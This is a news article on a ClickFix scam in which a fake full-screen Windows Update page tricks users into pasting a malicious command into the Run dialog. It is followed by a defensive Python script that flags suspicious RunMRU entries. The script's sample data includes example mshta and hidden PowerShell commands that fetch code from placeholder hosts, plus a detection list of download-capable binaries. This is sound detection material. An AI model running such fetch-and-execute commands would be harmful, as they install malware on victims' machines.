Hackers Use Fake Windows Update Screen to Trick Users Into Running Malware Commands

 

A new cyberattack is circulating online, disguising itself as a legitimate Windows update in an effort to deceive users into executing harmful commands that can lead to malware installation.

Daniel B., a cybersecurity researcher with the UK’s National Health Service, discovered the scheme while examining malicious activity online. According to his findings, the operation has been active for about a month on the domain groupewadesecurity[.]com. When users visit the site, their computer—or even their smartphone—may suddenly display what looks like a genuine Windows update blue screen. This screen urges them to complete several keyboard steps.

In reality, the update screen is entirely fraudulent. It’s delivered through the browser and relies on the Fullscreen API to cover the entire display, creating the illusion of a system-level update. The interface then instructs users to press the Windows key along with the R key, which opens the Run dialog box on Windows systems. Meanwhile, the website silently places malicious commands onto the user’s clipboard.

The next prompt tells the user to hit “CTRL + V” to paste—and then press Enter. Anyone who follows these steps unknowingly triggers a command instructing Windows to execute code hosted on the attacker-controlled domain.

This attack is a fresh spin on the ongoing “ClickFix” technique, which has been used for roughly a year to manipulate users into running commands that install malware. Previous ClickFix campaigns have appeared as fake CAPTCHA pages, counterfeit Chrome error messages, and bogus government portals. The method continues to evolve in pursuit of new ways to lure victims. As Daniel B. noted, “The more recent ClickFix campaigns like these fake Windows update pages are a powerful reminder that user vigilance and cybersecurity awareness training are just as critical as technical defenses.”

Thankfully, the attack is relatively simple to detect and avoid. No legitimate website or service will ever ask users to perform such system-level commands. Since the fake screen is just a browser tab in full-screen mode, closing the tab or window immediately stops the attack. Chrome also helps by prompting users to press “ESC” whenever the browser enters full-screen mode unexpectedly.

Despite this, cybersecurity firms say ClickFix-related campaigns are rising sharply. Because the user is the one unknowingly triggering the malicious code, traditional antivirus tools often fail to catch the threat. As ESET warned in June, "The list of threats that ClickFix attacks lead to is growing by the day, including infostealers, ransomware, remote access trojans, cryptominers, post-exploitation tools, and even custom malware from nation-state-aligned threat actors."
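For responders checking whether someone followed the Win+R, CTRL+V, Enter steps described above, the following triage sketch is an added example and not part of the original post. It assumes that commands entered in the Run dialog are recorded in the per-user RunMRU registry key; the sample export, host names and interpreter list are constructed for illustration.

```python
import re

# Constructed export of HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
# (value name -> data). Hosts are placeholders; command bodies are elided with "...".
SAMPLE_RUNMRU = {
    "MRUList": "dcba",  # value names, most recent first
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\reports\\1",
    "c": "mshta https://host-a.example/update\\1",
    "d": 'powershell -w hidden -c "... https://host-b.example/u ..."\\1',
}

# Script hosts and download-capable binaries a user rarely starts from Win+R (assumed list).
INTERPRETERS = {"powershell", "pwsh", "cmd", "mshta", "wscript", "cscript",
                "curl", "certutil", "bitsadmin", "msiexec", "rundll32", "regsvr32"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
HIDDEN_RE = re.compile(r"\s-w\w*\s+h\w*", re.I)  # e.g. "-w hidden", "-WindowStyle Hidden"

def parse_runmru(values):
    """Return Run-dialog commands, most recent first, without the trailing '\\1'."""
    cmds = []
    for name in values.get("MRUList", ""):
        data = values.get(name)
        if data is not None:
            cmds.append(data[:-2] if data.endswith("\\1") else data)
    return cmds

def reasons_for(cmd):
    """List the ClickFix-style signals present in one Run-dialog command."""
    parts = cmd.split()
    exe = parts[0].strip('"').lower().rsplit("\\", 1)[-1] if parts else ""
    exe = re.sub(r"\.exe$", "", exe)
    found = ["interpreter:" + exe] if exe in INTERPRETERS else []
    found += ["remote-url"] if URL_RE.search(cmd) else []
    found += ["hidden-window"] if HIDDEN_RE.search(cmd) else []
    return found

def triage(values):
    """Flag entries that pair an interpreter with a remote URL."""
    scored = [(cmd, reasons_for(cmd)) for cmd in parse_runmru(values)]
    return [(c, r) for c, r in scored
            if "remote-url" in r and any(x.startswith("interpreter:") for x in r)]

if __name__ == "__main__":
    for cmd, found in triage(SAMPLE_RUNMRU):
        print(found, "<-", cmd)
```

An entry flagged here is a lead for follow-up on that host, not proof of compromise; a clean RunMRU does not rule out commands that were run some other way.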